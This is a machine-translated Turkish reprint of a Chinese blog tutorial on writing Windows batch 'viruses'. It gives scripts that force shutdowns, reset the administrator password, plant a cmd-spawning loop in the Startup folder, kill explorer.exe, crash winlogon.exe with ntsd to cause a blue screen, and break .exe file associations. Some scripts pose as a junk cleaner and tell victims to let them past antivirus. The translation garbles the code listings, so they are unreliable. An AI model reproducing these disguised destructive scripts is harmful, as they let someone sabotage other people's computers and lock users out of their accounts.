[Editörün notu] Virüsün davetsiz misafiri, insanları onun hakkında konuşturur. Pelerin altında siyahlar içinde saklanan bir adam gibi. "Himaye edilen" insanlar şanssız olacak. Bu makale, yazarın ağ güvenliği kendi kendine çalışma eğitim serilerinden biridir. Otomatik başlatma, parola değiştirme, programlı kapatma, mavi ekran ve işlem kapatma gibi işlevler dahil olmak üzere, virüs ilkelerine ilişkin basit bilgileri açıklayacak ve toplu kod aracılığıyla virüsler oluşturacaktır. Umarım bu temel makale herkese yardımcı olur ve umarım herkes güvenlik farkındalığını arttırır ve ilgili önlemleri alır. Herkesi tartışmaya davet ediyoruz.
Yazar | Yang Xiuzhang
Sorumlu Editör | Yu Yan
Bu makale, CSDN blog uzmanı Eastmount'tan yeniden basılabilir.
Açıklama: Öğretim yöntemlerinin suç işlemek için kullanılmasına kesinlikle karşı çıkıyorum.Tüm suç davranışları ciddi şekilde cezalandırılacak.Yeşil ağı birlikte sürdürmemiz gerekiyor.Arkasındaki ilkeleri anlamanız ve onları daha iyi korumanız tavsiye edilir.
1. Yarasa komut dosyasını kapatın
Bilgisayar virüsü (Bilgisayar Virüsü), derleyici tarafından bir bilgisayar programına eklenen, bilgisayar işlevlerini veya verilerini yok eden, bilgisayarın kullanımını etkileyebilen ve kendini kopyalayabilen bir dizi bilgisayar talimatı veya program kodudur. Bilgisayar virüsleri yayılıyor, gizli, bulaşıcı, gizli, uyarıcı, ifade edici veya yıkıcı.
Bir bilgisayar virüsünün yaşam döngüsü: geliştirme aşaması bulaşıcı aşama kuluçka aşaması saldırı aşaması keşif aşaması sindirim aşaması ölüm aşaması. Bilgisayar virüsü bir programdır, çalıştırılabilir bir kod parçasıdır. Biyolojik virüsler gibi, kendi kendine üreme, karşılıklı enfeksiyon ve rejenerasyon aktivasyonu özelliklerine sahiptirler. Bilgisayar virüsleri benzersiz bir çoğalma yeteneğine sahiptir, hızlı bir şekilde yayılabilirler ve genellikle ortadan kaldırılmaları zordur. Kendilerini çeşitli dosya türlerine ekleyebilirler ve dosyalar bir kullanıcıdan diğerine kopyalandığında veya aktarıldığında, dosyalarla birlikte yayılırlar.
Aşağıda, kapatmayı sağlamak için esas olarak "kapatmayı" çağıran ilk toplu komut dosyası açıklanmaktadır. Temel adımlar aşağıdaki gibidir:
Yeni metin belgesi
Shutdown -s -t 600 girin
Txt'yi bat olarak değiştirin
Aşağıdaki şekilde gösterildiği gibi, CMD'yi çalıştırmak, kapatma komutunun temel kullanımını görüntüleyebilir.
Temel komutlar şunlardır:
1 kapatma -s -t 6002 // Şimdi 600 saniye sonra sistemin kapanmasına izin verin 34kapatma -a 5 // Bilgisayarı kapatmayı sonlandırınÇalışma sonucu aşağıdaki şekilde gösterilmektedir:
Yeni bir "test.bat" oluşturun ve "shutdown -s -t 600" doldurun. Bazı sistemlerin "Klasör Seçenekleri" altında "Bilinen dosya türlerinin uzantılarını gizle" yi görüntülemesi gerekir.
Kapatmayı çalıştırmak için BAT dosyasına çift tıklayın İptal etmeniz gerekirse, CMD kara kutusuna "shutdown -a" komutunu girin.
2. Parolayı değiştirin ve virüsü düzenli olarak kapatın
Ardından, daha eksiksiz bir virüs üretim sürecini paylaşın.
İlk adım, yeni bir game.bat dosyası oluşturmaktır.
Program aşağıda gösterilmiştir, burada "@echo off" yankıyı kapatmak ve "color 0a" rengi ayarlamak anlamına gelir.
1 @ eko kapalı 2renk 0a 3title Eastmount programı 45echo ================================== 6echo menüsü 7echo 1. Yönetici parolasını değiştirin 8echo 2. Zamanlayıcı kapatma 9echo 3. Programdan çıkın 10echo ================================== 1112pauseİşlemin sonucu aşağıdaki şekilde gösterilmiştir.Başlığın "Eastmount Programı" olduğunu ve ilgili içeriğin bulunduğunu görebilirsiniz.Bu, toplu iş dosyası yürütme işlemidir.
İkinci adım, bir seçim kararı vermektir Programın kullanıcı ile etkileşime girmesi gerekir.
Temel kod "set / p num = Seçiminiz:", yani num değişkenini ayarlamak anlamına gelir, "/ p" duraklatmak ve kullanıcı girdisini beklemek anlamına gelir ve kullanıcı tarafından girilen son değer num'a atanır.
1 @ eko kapalı 2renk 0a 3title Eastmount programı 45echo ================================== 6echo menüsü 7echo 1. Yönetici parolasını değiştirin 8echo 2. Zamanlayıcı kapatma 9echo 3. Programdan çıkın 10echo ================================== 1112set / p num = Seçiminiz: 1314 duraklatÇıktı sonucu aşağıdaki şekilde gösterilmektedir:
Üçüncü adım, yöneticinin şifresini değiştirmek, düzenli olarak kapatmak ve çıkmak için komutlar eklemektir.
Yönetici şifresini değiştirme komutu tüm Microsoft sistemleri için ortak bir komuttur Aşağıdaki kod, mevcut yönetici şifresini "123456" olarak değiştirmektir.
1 net kullanıcı yöneticisi 123456İkinci seçenek kapatmadır, komut aşağıdaki gibidir:
1 kapatma -s -t 100Üçüncü seçenek programdan çıkmaktır.
1 çıkışArdından kararı yazın ve toplu kodu atlayın, kod aşağıdaki gibidir, " > "nul", çalışan bilgi isteminin çıkmayacağı anlamına gelir.
1 @ eko kapalı 2renk 0a 3title Eastmount programı 45: menü 6echo ================================== 7echo menüsü 8echo 1. Yönetici parolasını değiştirin 9echo 2. Zamanlayıcı kapatma 10echo 3. Programdan çıkın 11echo ================================== 1213set / p num = Seçiminiz: 14if "% num%" == "1" 1'e git 15if "% num%" == "2" 2. goto 16if "% num%" == "3" 3'e git 1718: 119net kullanıcı yöneticisi 123456 > nul 20echo Parolanız başarıyla ayarlandı! 21 duraklat 22goto menüsü yirmi üç 24: 225kapatma -s -t 10026goto menüsü 2728: 329çıkŞu anda "1" girmek, aşağıdaki şekilde gösterildiği gibi bir sistem hatasına neden olacaktır:
Aynı zamanda, anti-virüs yazılımı, bilgisayar korsanından bilgisayarı değiştirmesini isteyecektir, sadece "İşleme İzin Ver" seçeneğine tıklayın,
Ardından ekranı temizlemek için "cls" komutunu ekleyin. Aynı zamanda, "4" sayısını girmekten kaçınmak için baştan sona yürütülecektir, bir uyarı mesajı ekleyin. Kod aşağıdaki şekilde değiştirilmiştir:
1 @ eko kapalı 2renk 0a 3title Eastmount programı 45: menü 6cls 7echo ================================== 8echo menüsü 9echo 1. Yönetici parolasını değiştirin 10echo 2. Zamanlayıcı kapatma 11echo 3. Programdan çıkın 12echo ================================== 1314set / p num = Seçiminiz: 15if "% num%" == "1" 1'e git 16if "% num%" == "2" 2. goto 17if "% num%" == "3" 3'e git 1819echo Merhaba! Lütfen 1-3 doğru sayı girin 20pause 21goto menüsü yirmi iki 23: 124net kullanıcı yöneticisi 123456 > nul 25echo Parolanız başarıyla ayarlandı! 26 duraklat 27goto menüsü 2829: 230 kapatma -s -t 10031goto menüsü 3233: 334çıkŞu anda, aşağıdaki şekilde gösterildiği gibi çalışır:
Kodu değiştirmeye, kullanıcı adını ve yeni şifre setini, kapatma zamanını vb. Eklemeye devam edin.
1 @ eko kapalı 2renk 0a 3title Eastmount programı 45: menü 6cls 7echo ================================== 8echo menüsü 9echo 1. Yönetici parolasını değiştirin 10echo 2. Zamanlayıcı kapatma 11echo 3. Programdan çıkın 12echo ================================== 1314set / p num = Seçiminiz: 15if "% num%" == "1" 1'e git 16if "% num%" == "2" 2. goto 17if "% num%" == "3" 3'e git 1819echo Merhaba! Lütfen 1-3 doğru sayı girin 20pause 21goto menüsü yirmi iki 23: 124set / p u = Lütfen kullanıcı adını girin: 25set / p p = Lütfen yeni bir şifre girin: 26net kullanıcı% u%% p% > nul 27echo Parolanız başarıyla ayarlandı! 28 duraklat 29goto menüsü 3031: 232set / p time = Lütfen zamanı girin: 33kapanma -s -t% zaman% 34goto menüsü 3536: 337çık"Yönetici" olarak çalıştırdıktan sonra, "xiuzhang" kullanıcısının açılış şifresini başarıyla değiştirin.
Kapanma zamanını ayarlamak için 2 girin, böylece burada tekrar etmeyeceğim. İlk bölüm ayrıntılı olarak açıklanmıştır.
3. Kendi kendine başlayan çökme virüsü
Sonra "sistem çöp temizleme" gibi görünen bir kod yazın. Bu aslında sistemin çökmesine neden olan bir koddur. Bir "virüs" olarak kabul edilemez, daha çok bir şaka programıdır. İlke, CMD programını açmaya devam etmek, sistem kaynaklarını kullanmak ve makinenin çökmesine neden olmaktır ve her açıldığında otomatik olarak başlayacaktır.
Not: Burada, kodu sanal bir makinede çalıştırmanızı önerdiğimi vurguluyorum. Bir güvenlik mühendisi olarak, güvenlik açıklarının ardındaki ilkeleri anlayacağınızı ve bunlara karşı daha iyi savunacağınızı umuyoruz.Tüm yasadışı faaliyetleri önlemek için yeşil ağı birlikte sürdürmemiz gerekiyor.
İlk adım, C: \ windows dizininde "windows.bat" dosyasını oluşturmaktır. Bir" > "Dosya içeriğinin üzerine yazmak anlamına gelir, iki" > > "Dosyanın sonuna bir cümle eklemek anlamına gelir.
1echo başlangıç cmd > c: \ windows \ windows.bat 2echo% 0 > > c: \ windows \ windows.batKullanıcı bu programı açtıktan sonra, program cmd'yi açmaya devam edecek, sistem kaynaklarını işgal edecek ve sistemin çökmesine neden olacaktır.% 0, programı yeniden çalıştırmak anlamına gelir. Ancak bu, kullanıcıyı yalnızca bir kez çökertebilir.Sistemi yeniden başlattıktan sonra, dosya artık açılmadığında dosya artık saldırıya uğramayacaktır.
İkinci adım, bu kötü amaçlı komut dosyasını önyükleme menüsüne koymaktır ve her açıldığında otomatik olarak başlayıp çalışacak ve bilgisayarın çökmesine neden olacaktır.
Hata seviyesi, sistem değişiklikleri ile değişen önceden tanımlanmış bir değişkendir. 0 ise, önceki komutun başarıyla yürütüldüğü anlamına gelir, 0 değilse, önceki komutun yürütülemediği anlamına gelir, Win7 sistemi değil, aşağıdaki komutu çalıştırın (XP sistemi, 2003 sistemi).
"Echo." Kodu, kod gibi boş bir satır anlamına gelir:
Çıktı sonucu aşağıdaki şekilde gösterilmektedir:
Üçüncü adım, bir sonraki alan kodunu yazmaktır Kodun tamamı aşağıda gösterilmiştir.
1 @ yankı kapalı 2. başlık sistemi çöp temizleme 3 renk 2f 4echo ===== Kötü niyetli olarak engelleyen bir anti-virüs yazılımı varsa, lütfen [Programın tüm işlemlerine izin ver] 'i seçin ==== 5echo. 6echo. 78echo başlangıç cmd > c: \ windows \ windows.bat 9 :: echo %% 0 > > c: \ windows \ windows.bat 1011 c: \ windows \ windows.bat "% USERPROFILE% \ AppData \ Roaming \ Microsoft \ Windows \ Başlat Menüsü \ Programlar \ Başlangıç \" kopyalayın > nul 12if% errorlevel% == 0 sonrakine git 1314 c: \ windows \ windows.bat "% USERPROFILE% \" Başlat "menüsü \ Programlar \ Başlat \" kopyalayın > nul 15if% errorlevel% == 1 goto hatası 1617: sonraki 18echo. 19echo. 20echo ===== Çöp temizleme, lütfen pencereyi kapatmayın ========= 21echo. 22ping -n 5127.0.0.1 > nul 23echo. 24echo ===== Çöp temizlendi, toplam 500 milyon çöp temizlendi ======= 25echo. 26echo. 27echo ===== Bilgisayarı hemen yeniden başlatmanız önerilir ========== 28 duraklat 2930: hata 31echo. 32echo. 33echo ====== Program çalıştırılamadı, lütfen tekrar çalıştırmak için [yönetici ayrıcalıklarını kullanın]! ======== 34echo. 35 duraklatTekrarlanan işlem kodunu ":: echo %% 0 yorumladığıma dikkat edin > > c: \ windows \ windows.bat ", aksi takdirde otomatik olarak başlamak zahmetli olacaktır.Ardından kodu aşağıdaki şekilde gösterildiği gibi çalıştırın," Yönetici olarak çalıştır "a sağ tıklamanız gerekir.
Kod, C: \ windwos dizininde bir toplu iş dosyası "windows.bat" oluşturacaktır.
Dosya aynı zamanda Win10 sistemimin otomatik dizininde de mevcuttur.
Dizin: \ AppData \ Roaming \ Microsoft \ Windows \ Başlat Menüsü \ Programlar \ Başlangıç \
Dosyayı açın ve CMD'nin açılması anlamına gelen "start cmd" kodunun yazıldığını görebilirsiniz.
"Windows.bat" dosyasına çift tıklayın ve sonuç aşağıdaki şekilde gösterilecektir.
sonuç olarak: Bu makale bir sistem temizleme aracı yazıyor Aslında, bu windows.bat, kullanıcı her başlatıldığında programı çalıştırma amacına ulaşmak için kullanıcının kendi kendine başlatma dizinine yazılmıştır, kaynakları işgal etmek için CMD'yi tekrar tekrar çağırır. Virüs vurulursa, kullanıcı Windows.bat dosyasını silmek veya sistemi yeniden yüklemek için başlangıç dizinini açmak için PE'yi kullanabilir.Yine, tekrar tekrar çalışmasına izin vermemenizi öneririm.
Dördüncü. Yakın virüsü işleyin
Çöp temizleme gibi görünen bir parti koduna bakalım. Komut, işlemi sonlandırmaktır, "/ im explorer.exe", öldürülmesi gereken sürecin adı ve masaüstünü kapatmak anlamına gelir; "/ f", zorla öldürmek anlamına gelir; > "nul" ekranda herhangi bir bilgi çıktılmaması anlamına gelir.
1taskkill / im explorer.exe / f > nul 2 > nulKodun tamamı aşağıdaki gibidir, burada "c: \ windows \ expolrer.exe'yi başlat", masaüstünü açmaya devam etmek anlamına gelir, "ping -n 5127.0.0.1 > Zamanı tüketmek için "nul" kullanılır.
1 @ yankı kapalı 2. başlık sistemi çöp temizleme 3 renk 2f 4echo ===== Kötü niyetli olarak engelleyen bir anti-virüs yazılımı varsa, lütfen [Programın tüm işlemlerine izin ver] 'i seçin ==== 5echo. 6echo. 7echo. 8echo ===== Çöp temizleme, lütfen pencereyi kapatmayın ========= 9echo. 10ping -n 5127.0.0.1 > nul 11taskkill / im explorer.exe / f > nul 2 > nul 12echo. 13echo ===== Onu çevirdim, sisteminiz terk edildi ======= 14echo. 15ping -n 5127.0.0.1 > nul 16echo. 17C: \ windows \ explorer.exe'yi başlatın 18echo. 19echo ===== düzeltildi! Korktun mu! ! O (_) O ========== 20pauseToplu iş programını çalıştırın, aşağıdaki şekilde gösterildiği gibi masaüstü kaybolacaktır.
Bir süre sonra masaüstü geri yüklenecektir. Yazarın masaüstü çok dağınık olduğundan, burada yalnızca duvar kağıdı görüntüsü görüntülenir.
Beş. En basit mavi ekran bomba dosyası
Yeni metin belgesi
Giriş: ntsd -c q -pn winlogon.exe, bu, işlemin sonlandırmaya zorlandığı anlamına gelir
araç > Dosya seçenekleri- > Görünüm- > "Bilinen dosya türlerinin uzantılarını gizle" yi işaretleyin
txt bat için değiştirildi
Başlat- > program- > Başlayın, game.bat dosyasını açın
Bilgisayar korsanları nadiren kişilere saldırır ve genellikle sunuculara saldırır. Bu komut özellikle 2003 sunucuları için öldürücüdür.
Çift tıkladıktan sonra, sunucu doğrudan mavi bir ekran görüntüler ve yeniden başlar.
ntsd, Windows 2000'den beri system32 dizini altında sistemle birlikte gelen süreç hata ayıklama aracıdır. Ntsd'nin işlevi çok güçlüdür ve kullanımı daha karmaşıktır, ancak yalnızca bazı işlemleri sonlandırmak için kullanılıyorsa, nispeten basittir. Windows'da yalnızca System, SMSS.EXE ve CSRSS.EXE öldürülemez. İlk ikisi saf çekirdek modudur ve sonuncusu, ntsd'nin kendisinin ihtiyaç duyduğu Win32 alt sistemidir. Lsass.exe'yi öldürmeyin, yerel hesap güvenliğinden sorumludur. Hata ayıklayıcı tarafından eklenen işlem hata ayıklayıcıyla birlikte sonlandırılacak, böylece işlemi komut satırında sonlandırmak için kullanılabilir.
Cmd'yi açtıktan sonra, işlemi sonlandırmak için aşağıdaki komutu girin:
Yöntem 1: İşlemi sonlandırmak için işlemin PID'sini kullanın
Komut formatı: ntsd -c q -p pid
Komut örneği: ntsd -c q -p 1332 (explorer.exe işlemini sonlandırmak için)
Örnek ayrıntılı açıklama: explorer.exe'nin pid'i 1332'dir, ancak işlemin pid'i nasıl alınır? Geçerli görev yöneticisindeki tüm işlemlerin PID'lerini almak için CMD altına TASKLIST girin. Veya görev yöneticisini açın, menü çubuğunda "Görüntüle" yi seçin - > "Sütun seçin", açık seçim penceresinde "PID (İşlem Tanımlayıcısı)" öğesini kontrol edin, böylece görev yöneticisi sürecinde ek bir PID öğesi olacaktır. PID tahsisi sabit değildir, işlem başladığında sistem tarafından rasgele tahsis edilir, bu nedenle işlemin her seferinde başladığı işlem genellikle farklıdır.
Yöntem 2: İşlemi sonlandırmak için işlem adını kullanın
Komut formatı: ntsd -c q -pn xxxx.exe (xxxx.exe işlem adıdır, exe kaydedilemez)
Komut örneği: ntsd -c q -pn explorer.exe
İşlemi sonlandırabilecek diğer DOS komutları, taskkill ve tskill komutlarıdır.
6. En basit uzantı virüsü
Dosya biçimini değiştirmek veya belgeleri şifrelemek, Eternal Blue, fidye yazılımı vb. Gibi yaygın virüslerdir. Bilgisayardaki tüm verileri ve belgeleri şifreler. Dosyayı açmak istediğinizde bir şifreye ihtiyacınız vardır. Şu anda Bitcoin ile ödeme yapabilirsiniz. Gasp.
Aşağıdaki küçük işlem, exe dosyasını bir txt dosyasına değiştirmektir. Çalıştırılabilir bir exe dosyasıyla karşılaştığınızda, bunun bir txt dosyası olduğunu düşünür ve Not Defteri ile açarak çalıştırılabilir programın çalışmamasına neden olur.Bu virüsün ilkesidir.
Yeni metin belgesi
Kod ekleyin: assoc.exe = txtfile
araç > Dosya seçenekleri- > Görünüm- > "Bilinen dosya türlerinin uzantılarını gizle" yi işaretleyin
txt bat için değiştirildi
Başlat- > program- > Başlat, yarasa dosyasını aç
Bat dosyasını çalıştırmak için çift tıkladıktan sonra, yürütülebilir dosyamız bir txt dosyası haline gelir. Şu anda, sistem exe'nin sistemin ilişkisini karıştıran bir txt programı olduğunu düşünüyor ve onu geri yüklemek çok zahmetli.
EXE programı aşağıdaki şekilde gösterildiği gibi açılır.
CMD'yi açmak bile bir TXT metin dosyasıdır.
Ardından exe dosyasını geri yüklemek için aşağıdaki komutu uygulamanız gerekir.
assoc.exe = exefile
Geri yüklenen kod ve efekt aşağıdaki şekilde gösterilmektedir.
Diğer tüm dosya biçimleri aşağıda gösterildiği gibi txt dosyalarına dönüştürülür. Şu anda, dosya uzantısını gizlerseniz, simgeyi hedef uygulama gibi davranacak şekilde bile değiştirebilirsiniz.Kullanıcı onu tıkladığında imha gerçekleştirilecektir, ancak hedefin gizli bir dosya uzantısı olup olmadığını bilmediğiniz için bu "aptal" yöntem önerilmez.
1assoc .htm = txtfile 2assoc .dat = txtfile 3assoc .com = txtfile 4assoc .rar = txt dosyası 5assoc .gho = txtfile 6assoc .mvb = txtfile 7 ...Çözüm:
Ne yazık ki virüse yakalanırsanız nasıl çözülür? Aşağıdaki şekilde gösterildiği gibi, tüm doğru ilişkileri geri yükleyin.
Not: Burada açıklanmayacak olan VBS betikleri, web sayfası açılır pencereleri (web sitesi phishing) gibi bazı virüsler de vardır.Okuyucuların "25. Web Güvenliği Öğrenme Yolu ve Truva Atı, Virüs ve Savunmanın Ön Keşfi" makalesini okumaları önerilir. Virüs programını başlangıç öğesine koyarsanız, her başlattığınızda otomatik olarak yürütülür.
Yedi. Özet
Umarım bu yazı dizisi size yardımcı olur, gerçekten iyi bir becerim ve öğrenecek çok şeyim olduğunu hissediyorum. Bu, ağ güvenliğinden sistem güvenliğine, Truva atı virüsünden arka kapı kaçırmaya, kötü amaçlı koddan izlenebilirlik analizine, sızma aracından ikili araca ve ayrıca Python güvenliği, en iyi konferans kağıtları, bilgisayar korsanı yarışmalarına kadar 44. orijinal güvenlik makalesi serisidir. Boşluklarla paylaşın. Bilinmeyen saldırı ve savunma, hayat uzun bir yol, yeni başlayan biri olarak gerçekten ileri sürüyorum, yardımları için birçok kişiye teşekkür ediyorum, sürünmeye devam et, neşelendirmeye devam et!
Tartışmak için herkese hoş geldiniz, bu makale dizisinin size yardımcı olduğunu düşünüyor musunuz? Okuyucuları bilgilendirmek ve birbirlerini teşvik etmek için herhangi bir öneri yorumlanabilir.
Cesur bir adam, ülke ve insanlar için harikadır. Ön saflardaki sağlık personeline, askerlere, işçilere, bilim adamlarına ve tüm işçilere saygı gösterin. Çin halkımızın yaşamdaki en büyük arayışı, yüreklerimizi göklere ve yeryüzüne, insanların yaşamları için, kutsal olana, en iyi bilgiyi miras almak ve tüm nesiller için barış için yerleştirmektir. Gerçekten yaptılar. Hayatta yıllar yok ama bu insanlar bizim için yükü taşıyorlar. Umarım herkes sağlıklı ve güvende olur, maske takıp evde kalın, ellerini sık sık yıkayın ve daha çok yiyin. Hadi Wuhan, hadi Hubei, hadi Çin. Bir araya gelin ve kazanın! ! !
Orijinal bağlantı:
https://blog.csdn.net/Eastmount/article/details/104146757